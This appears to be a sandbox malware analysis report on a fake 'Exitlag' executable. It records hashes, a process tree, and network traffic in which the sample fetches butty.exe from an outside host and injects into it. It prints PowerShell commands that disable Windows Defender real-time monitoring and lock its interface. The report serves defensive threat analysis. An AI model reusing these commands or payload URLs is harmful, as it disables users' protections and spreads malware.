Overview
overview
10Static
static
10Exitlag/Exitlag.exe
windows7-x64
8Exitlag/Exitlag.exe
windows10-2004-x64
8Exitlag/Wi...er.dll
windows7-x64
1Exitlag/Wi...er.dll
windows10-2004-x64
1Exitlag/as...er.dll
windows7-x64
1Exitlag/as...er.dll
windows10-2004-x64
1Exitlag/as...in.dll
windows10-2004-x64
7Exitlag/as...el.dll
windows10-2004-x64
1Exitlag/as...de.dll
windows10-2004-x64
7Exitlag/li...et.dll
windows7-x64
1Exitlag/li...et.dll
windows10-2004-x64
1Exitlag/li...ac.dll
windows7-x64
1Exitlag/li...ac.dll
windows10-2004-x64
1Exitlag/li...rm.dll
windows7-x64
1Exitlag/li...rm.dll
windows10-2004-x64
1Exitlag/li...ht.dll
windows7-x64
1Exitlag/li...ht.dll
windows10-2004-x64
1Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
06-01-2025 07:11
Behavioral task
behavioral1
Sample
Exitlag/Exitlag.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Exitlag/Exitlag.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Exitlag/WindowsManager.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Exitlag/WindowsManager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Exitlag/assets/TapInstaller.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Exitlag/assets/TapInstaller.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Exitlag/assets/WSearchMigPlugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
Exitlag/assets/WpcMigration.Uplevel.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Exitlag/assets/WsUpgrade.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
Exitlag/library/ARSoft.Tools.Net.dll
Resource
win7-20241010-en
Behavioral task
behavioral11
Sample
Exitlag/library/ARSoft.Tools.Net.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
Exitlag/library/Autofac.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
Exitlag/library/Autofac.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
Exitlag/library/GalaSoft.MvvmLight.Platform.dll
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
Exitlag/library/GalaSoft.MvvmLight.Platform.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
Exitlag/library/GalaSoft.MvvmLight.dll
Resource
win7-20240729-en
Behavioral task
behavioral17
Sample
Exitlag/library/GalaSoft.MvvmLight.dll
Resource
win10v2004-20241007-en
General
-
Target
Exitlag/Exitlag.exe
-
Size
71.1MB
-
MD5
50c9ab0b2423ac229c46cc00fe90bc3c
-
SHA1
e0bee49bc0120aa8f84b65a26cb2d25e943e5b79
-
SHA256
b4ddfe40ced34d89fc71db575c2a68c17c79551338411f012a2f28764c09a870
-
SHA512
de0c0c2bb751c7fddbf8c5502dbc6b88414754b839f66fa7930c8e6788b69e2394b4040b0dfcad4b3add97dee9094b2f97fa2b1b5dd11165eb59bfe6714ac4f9
-
SSDEEP
3072:Dc69mBoayt0cg6rlagjm2lXImnS7meRtZUBRPhutDFdM3fkdJ41:D/m2a7cxx59nxGtZykDFdIB
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2964 butty.exe 2724 butty.exe -
Loads dropped DLL 2 IoCs
pid Process 1600 Exitlag.exe 2964 butty.exe -
pid Process 356 powershell.exe 1032 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2964 set thread context of 2724 2964 butty.exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1032 powershell.exe 356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1032 powershell.exe Token: SeDebugPrivilege 356 powershell.exe Token: SeDebugPrivilege 1600 Exitlag.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1600 wrote to memory of 1032 1600 Exitlag.exe 30 PID 1600 wrote to memory of 1032 1600 Exitlag.exe 30 PID 1600 wrote to memory of 1032 1600 Exitlag.exe 30 PID 1600 wrote to memory of 356 1600 Exitlag.exe 32 PID 1600 wrote to memory of 356 1600 Exitlag.exe 32 PID 1600 wrote to memory of 356 1600 Exitlag.exe 32 PID 1600 wrote to memory of 2964 1600 Exitlag.exe 35 PID 1600 wrote to memory of 2964 1600 Exitlag.exe 35 PID 1600 wrote to memory of 2964 1600 Exitlag.exe 35 PID 2964 wrote to memory of 2724 2964 butty.exe 36 PID 2964 wrote to memory of 2724 2964 butty.exe 36 PID 2964 wrote to memory of 2724 2964 butty.exe 36 PID 2964 wrote to memory of 2724 2964 butty.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe"C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -UILockdown $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:356
-
-
C:\Users\Admin\AppData\Local\Temp\butty.exe"C:\Users\Admin\AppData\Local\Temp\butty.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\butty.exe"C:\Users\Admin\AppData\Local\Temp\butty.exe"3⤵
- Executes dropped EXE
PID:2724
-
-
Network
-
Remote address:8.8.8.8:53Requestmoondarklight.meIN AResponsemoondarklight.meIN A104.21.40.53moondarklight.meIN A172.67.176.118
-
Remote address:104.21.40.53:443RequestGET /oops.exe HTTP/1.1
Host: moondarklight.me
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: STALE
Age: 29412
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze9glAbFMHdmDh1plSDzb7tlp8XGvJhn8d4rUU5a%2FY83fjxh7qJ4yV%2B3GUfdWW4gY7sJ%2BotdlyKGghV4z7vwKskO026VHGbNnO98Wpl5dRenWT%2FwGStj6B2W50ysMYmZZDwV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9e4bd8e2b651f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=63909&min_rtt=59947&rtt_var=19282&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=355&delivery_rate=57304&cwnd=253&unsent_bytes=0&cid=7beccaed76cab983&ts=186&x=0"
-
Remote address:8.8.8.8:53Requestbellingthesun.comIN AResponsebellingthesun.comIN A172.67.142.117bellingthesun.comIN A104.21.95.4
-
Remote address:172.67.142.117:443RequestGET /haskitime/butty.exe HTTP/1.1
Host: bellingthesun.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3276800
Connection: keep-alive
Last-Modified: Wed, 25 Dec 2024 16:48:54 GMT
ETag: "676c3776-320000"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 991
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlJ%2BwmOtVuvQNFO99fB8vEH5%2BMC9ENq7%2F701R4s9IZwZiUpq6cD0ubCxSykM%2BuJW%2FDNJvW9PFV%2BgJnK7a92IfqSVhIG96jjdnvq7kck2fidlzFmx6HLmi56EBq%2BHRQA0%2Fru7BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9e4bfca7aedf2-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60568&min_rtt=59347&rtt_var=14653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=372&delivery_rate=63382&cwnd=253&unsent_bytes=0&cid=b9d0d0bd8e740aa3&ts=143&x=0"
-
757 B 4.3kB 9 9
HTTP Request
GET https://moondarklight.me/oops.exeHTTP Response
404 -
86.0kB 3.4MB 1704 2448
HTTP Request
GET https://bellingthesun.com/haskitime/butty.exeHTTP Response
200
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRO1RRF07MK0XF749642.temp
Filesize7KB
MD555e88676417c13a7e183aee45a993a31
SHA13a01dea4eeaef4bda242da6bd5c26e555fd0e6fd
SHA256fe1ccfcc20b52014494bc031b4ce38a0078a18b813c442a2c52882e8937eae60
SHA512e0829a444e9c35a8afc9261c95bd2cee7a9245ae0e1d5d21b80720c3a305b26252a21b99e9def079bbe2f2045a576e398a3eaad5fdad960d385c47d9555b1731
-
Filesize
3.1MB
MD53c3a898442526b47ad166a3774263e3e
SHA13e468fdc7ca16461f934559391d70b7296693d97
SHA2565be48844ce2ddefeac5d05580d420cb64990e82e89504b930cfb30962a5ce441
SHA51222ccaed307c4a2ab16ab3eb1dc00deff233f3d734730193d65c2a52bb208da8ab68c98e4605b3846c28fcc6b0106e5e2e31c52161d073e6eae75cd955beb89fd